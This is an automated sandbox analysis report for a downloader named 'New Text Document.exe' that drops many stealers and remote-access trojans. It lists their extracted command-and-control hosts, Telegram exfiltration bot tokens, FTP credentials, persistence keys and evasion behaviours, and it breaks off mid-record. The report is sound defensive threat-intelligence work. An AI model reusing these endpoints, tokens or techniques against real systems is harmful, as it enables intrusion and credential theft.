Resubmissions
09/02/2025, 17:26
250209-vzvbzaxpck 1009/02/2025, 17:22
250209-vxjsfsxqh1 1009/02/2025, 16:34
250209-t3jtzawper 1009/02/2025, 16:32
250209-t15nnaxjfv 827/01/2025, 22:33
250127-2gt2taxpgv 1027/01/2025, 22:28
250127-2d6lfaxnhy 1027/01/2025, 22:21
250127-19myjaxmew 10Analysis
-
max time kernel
48s -
max time network
902s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
09/02/2025, 17:22
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document.exe
Resource
win10v2004-20250129-en
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
Protocol: ftp- Host:
194.249.151.2 - Port:
21 - Username:
ftp - Password:
M0tH3ro0
Extracted
Protocol: ftp- Host:
198.58.123.10 - Port:
21 - Username:
root - Password:
admin
Extracted
Protocol: ftp- Host:
188.116.9.10 - Port:
21 - Username:
admin - Password:
290966
Extracted
phemedrone
https://api.telegram.org/bot7602843389:AAE9dcCKuyUGx9HUNQf9KbsZDhME6HwC10g/sendMessage?chat_id=1745421249
Extracted
xworm
127.0.0.1:2727
dnsdeerrorlehaxor.ddns.net:2727
-
Install_directory
%Public%
-
install_file
Discord.exe
-
telegram
https://api.telegram.org/bot5964175002:AAFK1mpStrMUWwegniLJuryZjOhVavZhSGo/sendMessage?chat_id=1745421249
Extracted
azorult
http://anastaf4.beget.tech
Extracted
xworm
5.0
157.20.182.169:1515
qqWjm3mbt3teI8Oz
-
install_file
USB.exe
Extracted
vidar
https://t.me/sok33tn
https://steamcommunity.com/profiles/76561199824159981
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
quasar
1.4.1
githubyt
87.228.57.81:4782
cf3988ab-2fd9-4544-a16f-9faa71eb5bac
-
encryption_key
19A0FAF8459F69650B5965C225752D425C429EEC
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchoost.exe
-
subdirectory
SubDir
Extracted
asyncrat
AsyncRAT
test
otrodia8912.gleeze.com:3333
123
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
njrat
Njrat 0.7 Golden By Hassan Amiri
HacKed
82.193.104.21:5137
Windows Update
-
reg_key
Windows Update
-
splitter
|Hassan|
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
0.tcp.in.ngrok.io:18220
HyFTucy74RnH
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Extracted
redline
Wipe
91.219.236.248:1912
Signatures
-
Asyncrat family
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Detect Vidar Stealer 7 IoCs
resource yara_rule behavioral1/memory/5652-2171-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/files/0x000a000000023cf2-4828.dat family_vidar_v7 behavioral1/memory/868-4830-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/5296-4914-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/5652-5372-0x0000000000400000-0x000000000085E000-memory.dmp family_vidar_v7 behavioral1/memory/868-5577-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/5296-5594-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023ca8-2334.dat family_xworm behavioral1/memory/5124-2355-0x0000000000B30000-0x0000000000B8C000-memory.dmp family_xworm behavioral1/files/0x0007000000023cdc-3001.dat family_xworm behavioral1/memory/6556-3707-0x00000000007E0000-0x00000000007F0000-memory.dmp family_xworm -
Nanocore family
-
Njrat family
-
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Quasar family
-
Quasar payload 9 IoCs
resource yara_rule behavioral1/files/0x000c000000023ceb-4839.dat family_quasar behavioral1/memory/8020-4849-0x0000000000ED0000-0x00000000011F4000-memory.dmp family_quasar behavioral1/files/0x0007000000023e46-12821.dat family_quasar behavioral1/files/0x0007000000023e49-12851.dat family_quasar behavioral1/files/0x0007000000023e4d-12887.dat family_quasar behavioral1/files/0x0007000000023e57-12907.dat family_quasar behavioral1/files/0x0008000000023e53-12927.dat family_quasar behavioral1/files/0x0009000000023e33-12948.dat family_quasar behavioral1/files/0x0009000000023e5a-12971.dat family_quasar -
Ramnit family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x000c000000023d34-5269.dat family_redline behavioral1/memory/2604-5277-0x0000000000940000-0x0000000000992000-memory.dmp family_redline -
Redline family
-
Vidar family
-
Xworm family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023d3f-4928.dat family_asyncrat behavioral1/files/0x000500000002307c-5082.dat family_asyncrat behavioral1/files/0x000b000000023cf5-5097.dat family_asyncrat -
Contacts a large (4012) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bjkm5hE.exe -
pid Process 6344 powershell.exe 5844 powershell.exe 3200 powershell.exe 5824 powershell.exe 8164 powershell.exe 1048 powershell.exe -
Downloads MZ/PE file 28 IoCs
flow pid Process 31 4844 New Text Document.exe 73 4844 New Text Document.exe 93 4844 New Text Document.exe 86 4844 New Text Document.exe 58 4844 New Text Document.exe 108 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 100 4844 New Text Document.exe 26 4844 New Text Document.exe 19 4844 New Text Document.exe 23 4844 New Text Document.exe 91 4844 New Text Document.exe 12 4844 New Text Document.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 5 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 3544 cmd.exe 7932 net.exe 6312 net.exe 5920 net.exe 5224 net.exe -
Modifies Windows Firewall 2 TTPs 32 IoCs
pid Process 7932 netsh.exe 1184 netsh.exe 10180 netsh.exe 9056 netsh.exe 8256 netsh.exe 7144 netsh.exe 1832 netsh.exe 10000 netsh.exe 3440 netsh.exe 6920 netsh.exe 6676 netsh.exe 7156 netsh.exe 8380 netsh.exe 1132 netsh.exe 8656 netsh.exe 5456 netsh.exe 8628 netsh.exe 7056 netsh.exe 2000 netsh.exe 1424 netsh.exe 7904 netsh.exe 4360 netsh.exe 6292 netsh.exe 5288 netsh.exe 6496 netsh.exe 6424 netsh.exe 8220 netsh.exe 9596 netsh.exe 5388 netsh.exe 4800 netsh.exe 1440 netsh.exe 9036 netsh.exe -
Uses browser remote debugging 2 TTPs 31 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2792 chrome.exe 5420 msedge.exe 5384 msedge.exe 6380 chrome.exe 1220 chrome.exe 4932 msedge.exe 1016 msedge.exe 7592 chrome.exe 7536 msedge.exe 6236 chrome.exe 5260 chrome.exe 6756 msedge.exe 6244 msedge.exe 5160 chrome.exe 3640 chrome.exe 6432 chrome.exe 7696 msedge.exe 6456 chrome.exe 3548 chrome.exe 8128 msedge.exe 7000 msedge.exe 6192 msedge.exe 2192 msedge.exe 6948 msedge.exe 5740 chrome.exe 1620 chrome.exe 6300 chrome.exe 7228 msedge.exe 6760 msedge.exe 3240 chrome.exe 7372 chrome.exe -
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000b000000023b02-7.dat net_reactor behavioral1/memory/760-15-0x0000000000DC0000-0x0000000000EA0000-memory.dmp net_reactor behavioral1/files/0x0007000000023d17-4736.dat net_reactor behavioral1/memory/5688-4765-0x0000000000A20000-0x0000000000A40000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bjkm5hE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bjkm5hE.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation New Text Document.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation steam.exe Key value queried \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation Discord.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3452 cmd.exe 4076 powershell.exe -
Executes dropped EXE 22 IoCs
pid Process 760 g.exe 2276 g.exe 1796 lem.exe 1356 StCl.exe 3976 untitled2.exe 5360 random.exe 5652 Bjkm5hE.exe 4476 silk.exe 5364 silk.tmp 2556 olddataeraser19.exe 3640 IMG001.exe 5332 z.exe 3816 steam.exe 2112 cpuminer-avx.exe 5124 Discord.exe 5284 Steam.exe 5432 bitcoin3000.exe 5576 savedecrypter.exe 4688 Update.exe 2964 tftp.exe 3084 cann.exe 5088 WindowsServices.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Software\Wine Bjkm5hE.exe -
Loads dropped DLL 5 IoCs
pid Process 5364 silk.tmp 2556 olddataeraser19.exe 2112 cpuminer-avx.exe 2112 cpuminer-avx.exe 2112 cpuminer-avx.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\beddfabafabcc = "\"C:\\ProgramData\\beddfabafabcc.exe\"" z.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bitcoin3000.exe Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\beddfabafabcc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\z.exe\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\beddfabafabcc = "\"C:\\ProgramData\\beddfabafabcc.exe\"" Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IMAP Monitor = "C:\\Program Files (x86)\\IMAP Monitor\\imapmon.exe" savedecrypter.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" Update.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe" WindowsServices.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA savedecrypter.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs
flow ioc 8878 6.tcp.eu.ngrok.io 100 raw.githubusercontent.com 1635 0.tcp.in.ngrok.io 2151 0.tcp.in.ngrok.io 4382 raw.githubusercontent.com 4756 0.tcp.in.ngrok.io 7374 0.tcp.in.ngrok.io 7448 0.tcp.in.ngrok.io 3074 6.tcp.eu.ngrok.io 3199 0.tcp.in.ngrok.io 4866 0.tcp.in.ngrok.io 8210 raw.githubusercontent.com 98 raw.githubusercontent.com 575 0.tcp.in.ngrok.io 926 0.tcp.in.ngrok.io 2521 0.tcp.in.ngrok.io 3998 0.tcp.in.ngrok.io 5461 0.tcp.in.ngrok.io 6907 0.tcp.in.ngrok.io 8815 0.tcp.in.ngrok.io -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 109 ip-api.com 860 ip-api.com 8245 ip-api.com -
pid Process 5220 cmd.exe 7396 ARP.EXE -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5308 cmd.exe 7672 powercfg.exe 7996 powercfg.exe 6200 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a000000023c98-2430.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 3496 tasklist.exe 7960 tasklist.exe 3376 tasklist.exe 3312 tasklist.exe 5216 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5360 random.exe 5652 Bjkm5hE.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 760 set thread context of 2276 760 g.exe 89 PID 1796 set thread context of 412 1796 lem.exe 119 -
resource yara_rule behavioral1/files/0x000a000000023cc2-2497.dat upx behavioral1/memory/5548-2498-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral1/memory/5320-2505-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral1/memory/5320-2509-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral1/memory/5548-2507-0x0000000000400000-0x000000000042E000-memory.dmp upx behavioral1/memory/2344-6388-0x00007FFEFC710000-0x00007FFEFCD75000-memory.dmp upx behavioral1/memory/2344-10240-0x00007FFF211D0000-0x00007FFF211F7000-memory.dmp upx behavioral1/memory/2344-10250-0x00007FFF21D70000-0x00007FFF21D7F000-memory.dmp upx behavioral1/memory/2344-12145-0x00007FFF1ACD0000-0x00007FFF1ACFB000-memory.dmp upx behavioral1/memory/2344-12156-0x00007FFF1C970000-0x00007FFF1C989000-memory.dmp upx behavioral1/memory/2344-12166-0x00007FFF1ACA0000-0x00007FFF1ACC5000-memory.dmp upx behavioral1/memory/2344-12176-0x00007FFF06F70000-0x00007FFF070EF000-memory.dmp upx behavioral1/memory/2344-12186-0x00007FFF1AC60000-0x00007FFF1AC79000-memory.dmp upx behavioral1/memory/2344-12206-0x00007FFF1AA40000-0x00007FFF1AA73000-memory.dmp upx behavioral1/memory/2344-12196-0x00007FFF1E340000-0x00007FFF1E34D000-memory.dmp upx behavioral1/memory/2344-12226-0x00007FFF199F0000-0x00007FFF19ABE000-memory.dmp upx behavioral1/memory/2344-12216-0x00007FFF065B0000-0x00007FFF06AE3000-memory.dmp upx behavioral1/memory/2344-12237-0x00007FFF19900000-0x00007FFF199B3000-memory.dmp upx behavioral1/memory/2344-12236-0x00007FFF1C950000-0x00007FFF1C95D000-memory.dmp upx behavioral1/memory/2344-12235-0x00007FFF1AAF0000-0x00007FFF1AB04000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\IMAP Monitor\imapmon.exe savedecrypter.exe File opened for modification C:\Program Files (x86)\IMAP Monitor\imapmon.exe savedecrypter.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023d29-4848.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 23 IoCs
pid pid_target Process procid_target 4800 760 WerFault.exe 88 3604 5688 WerFault.exe 191 7892 7644 WerFault.exe 198 3660 8060 WerFault.exe 204 4428 7068 WerFault.exe 273 6196 3084 WerFault.exe 140 1924 1180 WerFault.exe 287 6952 5176 WerFault.exe 626 8568 7880 WerFault.exe 630 9796 8504 WerFault.exe 633 3048 10236 WerFault.exe 637 8324 7528 WerFault.exe 640 5724 7492 WerFault.exe 648 2880 2464 WerFault.exe 652 9988 9456 WerFault.exe 657 6436 892 WerFault.exe 660 9372 1012 WerFault.exe 665 7564 9100 WerFault.exe 669 9884 9132 WerFault.exe 674 8884 9920 WerFault.exe 678 3812 5544 WerFault.exe 685 8228 6012 WerFault.exe 709 9708 5020 WerFault.exe 711 -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language StCl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language savedecrypter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lem.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language silk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language silk.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language olddataeraser19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsServices.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cann.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 39 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1128 PING.EXE 7884 PING.EXE 892 PING.EXE 7096 PING.EXE 5928 PING.EXE 3492 PING.EXE 7496 PING.EXE 3824 PING.EXE 3912 PING.EXE 1636 PING.EXE 4884 PING.EXE 3108 PING.EXE 6748 PING.EXE 1712 PING.EXE 5548 PING.EXE 5388 PING.EXE 5828 PING.EXE 6988 PING.EXE 4608 PING.EXE 2888 PING.EXE 7572 PING.EXE 7936 PING.EXE 4296 PING.EXE 6364 PING.EXE 5248 PING.EXE 5244 PING.EXE 6960 PING.EXE 3824 PING.EXE 7420 PING.EXE 5312 PING.EXE 8568 PING.EXE 7896 PING.EXE 9664 PING.EXE 4536 PING.EXE 5876 PING.EXE 1608 PING.EXE 6532 PING.EXE 7548 PING.EXE 2608 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3108 cmd.exe 7204 netsh.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023c74-2235.dat nsis_installer_1 behavioral1/files/0x0007000000023c74-2235.dat nsis_installer_2 -
Delays execution with timeout.exe 2 IoCs
pid Process 6656 timeout.exe 1952 timeout.exe -
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 348 net.exe 6424 net.exe 9908 net.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 7664 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 7392 systeminfo.exe -
Kills process with taskkill 8 IoCs
pid Process 6088 taskkill.exe 8896 taskkill.exe 8512 taskkill.exe 4076 taskkill.exe 1848 taskkill.exe 3968 taskkill.exe 5064 taskkill.exe 5520 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 39 IoCs
pid Process 4884 PING.EXE 9664 PING.EXE 7936 PING.EXE 3824 PING.EXE 2888 PING.EXE 5548 PING.EXE 5312 PING.EXE 5244 PING.EXE 4608 PING.EXE 3912 PING.EXE 5388 PING.EXE 7096 PING.EXE 7896 PING.EXE 7548 PING.EXE 1712 PING.EXE 1608 PING.EXE 8568 PING.EXE 5828 PING.EXE 6988 PING.EXE 7884 PING.EXE 7572 PING.EXE 6532 PING.EXE 1128 PING.EXE 5876 PING.EXE 3824 PING.EXE 3492 PING.EXE 1636 PING.EXE 6364 PING.EXE 7496 PING.EXE 2608 PING.EXE 4296 PING.EXE 892 PING.EXE 5248 PING.EXE 5928 PING.EXE 6748 PING.EXE 7420 PING.EXE 3108 PING.EXE 6960 PING.EXE 4536 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6740 schtasks.exe 9784 schtasks.exe 4628 schtasks.exe 5244 schtasks.exe 1728 schtasks.exe 4324 schtasks.exe 60 schtasks.exe 7772 schtasks.exe 9204 schtasks.exe 7576 schtasks.exe 4752 schtasks.exe 1548 schtasks.exe 6772 schtasks.exe 9788 schtasks.exe 5396 schtasks.exe 5388 schtasks.exe 7676 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 3976 untitled2.exe 1356 StCl.exe 1356 StCl.exe 1356 StCl.exe 5360 random.exe 5360 random.exe 5652 Bjkm5hE.exe 5652 Bjkm5hE.exe 2276 g.exe 2276 g.exe 2276 g.exe 2276 g.exe 5360 random.exe 5360 random.exe 5360 random.exe 5360 random.exe 5364 silk.tmp 5364 silk.tmp 5332 z.exe 5332 z.exe 5576 savedecrypter.exe 5576 savedecrypter.exe 5576 savedecrypter.exe 5576 savedecrypter.exe 1048 powershell.exe 1048 powershell.exe 1048 powershell.exe 5844 powershell.exe 5844 powershell.exe 5844 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4844 New Text Document.exe Token: SeDebugPrivilege 1356 StCl.exe Token: SeDebugPrivilege 3976 untitled2.exe Token: SeDebugPrivilege 4076 taskkill.exe Token: SeDebugPrivilege 1848 taskkill.exe Token: SeDebugPrivilege 3968 taskkill.exe Token: SeDebugPrivilege 5064 taskkill.exe Token: SeDebugPrivilege 5520 taskkill.exe Token: SeDebugPrivilege 5124 Discord.exe Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeDebugPrivilege 5576 savedecrypter.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeDebugPrivilege 5844 powershell.exe Token: SeShutdownPrivilege 3444 Explorer.EXE Token: SeCreatePagefilePrivilege 3444 Explorer.EXE Token: SeDebugPrivilege 3200 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 5364 silk.tmp 3084 cann.exe 3444 Explorer.EXE 3444 Explorer.EXE 3084 cann.exe 3084 cann.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3084 cann.exe 3084 cann.exe 3084 cann.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4844 wrote to memory of 760 4844 New Text Document.exe 88 PID 4844 wrote to memory of 760 4844 New Text Document.exe 88 PID 4844 wrote to memory of 760 4844 New Text Document.exe 88 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 760 wrote to memory of 2276 760 g.exe 89 PID 4844 wrote to memory of 1796 4844 New Text Document.exe 93 PID 4844 wrote to memory of 1796 4844 New Text Document.exe 93 PID 4844 wrote to memory of 1796 4844 New Text Document.exe 93 PID 4844 wrote to memory of 1356 4844 New Text Document.exe 94 PID 4844 wrote to memory of 1356 4844 New Text Document.exe 94 PID 4844 wrote to memory of 1356 4844 New Text Document.exe 94 PID 4844 wrote to memory of 3976 4844 New Text Document.exe 96 PID 4844 wrote to memory of 3976 4844 New Text Document.exe 96 PID 3976 wrote to memory of 4076 3976 untitled2.exe 98 PID 3976 wrote to memory of 4076 3976 untitled2.exe 98 PID 3976 wrote to memory of 1848 3976 untitled2.exe 99 PID 3976 wrote to memory of 1848 3976 untitled2.exe 99 PID 3976 wrote to memory of 3968 3976 untitled2.exe 100 PID 3976 wrote to memory of 3968 3976 untitled2.exe 100 PID 3976 wrote to memory of 5064 3976 untitled2.exe 101 PID 3976 wrote to memory of 5064 3976 untitled2.exe 101 PID 4844 wrote to memory of 5360 4844 New Text Document.exe 102 PID 4844 wrote to memory of 5360 4844 New Text Document.exe 102 PID 4844 wrote to memory of 5360 4844 New Text Document.exe 102 PID 4844 wrote to memory of 5652 4844 New Text Document.exe 103 PID 4844 wrote to memory of 5652 4844 New Text Document.exe 103 PID 4844 wrote to memory of 5652 4844 New Text Document.exe 103 PID 4844 wrote to memory of 4476 4844 New Text Document.exe 110 PID 4844 wrote to memory of 4476 4844 New Text Document.exe 110 PID 4844 wrote to memory of 4476 4844 New Text Document.exe 110 PID 4476 wrote to memory of 5364 4476 silk.exe 